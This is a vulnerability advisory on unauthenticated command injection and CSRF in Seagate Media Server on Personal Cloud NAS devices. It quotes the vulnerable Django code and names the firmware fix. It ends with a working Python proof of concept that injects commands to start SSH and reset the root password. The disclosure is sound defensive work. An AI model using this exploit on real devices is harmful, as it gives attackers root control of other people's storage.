Advisory

Yorick Koster, September 2017

Seagate Media Server multiple command injection vulnerabilities

Abstract

Seagate Personal Cloud is a consumer-grade Network-Attached Storage device (NAS). It was found that Seagate Media Server is vulnerable to command injection that allows an unauthenticated attacker to run arbitrary commands with root privileges. The application lacks protection against CSRF attacks, and is accessible via the personalcloud.local domain name. Due to this it is possible to exploit this issue via a malicious website without requiring the NAS to be directly accessible over the internet.

See also

CVE-2018-5347
SSD Advisory - Seagate Personal Cloud Multiple Vulnerabilities

Tested versions

This issue was tested on a Seagate Personal Cloud model SRN21C running firmware version 4.3.16.0. It is likely that other devices/models are also affected.

Fix

These vulnerabilities have been fixed in firmware version 4.3.18.0.

Introduction

Seagate Personal Cloud is a consumer-grade Network-Attached Storage device (NAS). Personal Cloud is deployed with the Seagate Media Server application that allows users to easily access their movies, music, and photos. The Seagate Media Server is accessible without authentication, by default a Public folder exists where anonymous users can upload files to.

It was found that Seagate Media Server is vulnerable to command injection. The application runs with root privileges and consequently allows an unauthenticated attacker to run arbitrary commands with elevated privileges. The affected pages lack protection against Cross-Site Request Forgery. In addition, the NAS is available using the personalcloud.local domain name via multicast Domain Name System (mDNS). Due to this it is possible to exploit this issue via a malicious website without requiring the NAS to be directly accessible over the internet and/or to know its IP address.

Details

Seagate Media Server uses the Django web framework and is mapped to the .psp extension. Any URL that ends with .psp is automatically send to the Seagate Media Server application using the FastCGI protocol.

/etc/lighttpd/conf.d/django-host.conf:
fastcgi.server += (
".psp"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   )),
".psp/"=>
   ((
      "socket" => "/var/run/manage_py-fastcgi.socket",
      "check-local" => "disable",
      "stream-post" => "enable",
      "allow-x-send-file" => "enable",
   ))
)

URLs are mapped to specific views in the file /usr/lib/django_host/seagate_media_server/urls.py. Two views were found to be affected by unauthenticated command injection. The affected views are:

- uploadTelemetry;
- getLogs.

These views takes user input from GET parameters and pass these unvalidated/unsanitized to methods of the commands Python module. This allows an attacker to inject arbitrary system commands, that will be executed with root privileges.

/usr/lib/django_host/seagate_media_server/views.py:
@csrf_exempt
def uploadTelemetry(request):
   ts = request.GET.get('TimeStamp','')
   if (checkDBSQLite()) :
      response = '{"stat":"failed","code":"80","message":"The Database has not been initialized or mounted yet!"}'
   else :
      if ts == "":
         response = '{"stat":"failed","code":"380","message":"TimeStamp parameter missing"}'
         return HttpResponse(response);
      cmd = "/usr/local/bin/log_telemetry "+str(ts)
      commands.getoutput(cmd)
   return HttpResponse('{"stat":"ok"}')

/usr/lib/django_host/seagate_media_server/views.py:
@csrf_exempt
def getLogs (request):
   try:
      cmd_base='/usr/bin/log-extract-manager.sh'
      uID = request.GET.get ( 'arch_id', None )
      time_stamp = request.GET.get ( 'time_stamp', '' )
   
      if uID:
         (status, output) = commands.getstatusoutput(cmd_base + ' status ' + uID);
         if ('In progress' in output) and (uID in output) :
            return HttpResponse ('{"stat":"ok", "data": {"status":"In Progress"}}')
         elif (status == 0) :
            return HttpResponse ('{"stat":"ok", "data": {"url":"%s", "fileSize":"%d"}}' % ( urllib.quote(output.encode('utf-8')), os.path.getsize(output) ))
         else :
            return HttpResponse ('{"stat":"failed", "code":"853","message":"Id not recognized."}' )
      else:
         (status, output) = commands.getstatusoutput(cmd_base + ' start ' + time_stamp);
         if (status == 0) :
            return HttpResponse ('{"stat":"ok", "data": {"archiveID":"%s"}}' % (output))
   
      return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )
   except :
      return HttpResponse ('{"stat":"failed", "code":"852","message":"Zip file not created."}' )

Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.

Proof of concept

The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.

#!/usr/bin/env python
import os
import urllib
   
scheme = 'http'
host = 'personalcloud.local'
port = '80'
path = 'uploadTelemetry.psp'
querystr = 'TimeStamp=%3b'
#path = 'getLogs.psp'
#querystr = 'time_stamp=%3b'
password = 'Welcome01'
   
cmds = ['ngc --start sshd 2>&1',
      'echo -e "%(s)s\n%(s)s"|passwd 2>&1' % {'s' : password}]
   
for cmd in cmds:
   print 'Running command', repr(cmd)
   cmd = urllib.quote_plus(cmd)
   r = urllib.urlopen('%s://%s:%s/%s?%s%s' % (scheme, host, port, path, querystr, cmd))
   print r.read()
   
print 'Log in with', password
os.system('ssh -p 2222 root@%s' % host)

Latest News & Research

Work with us →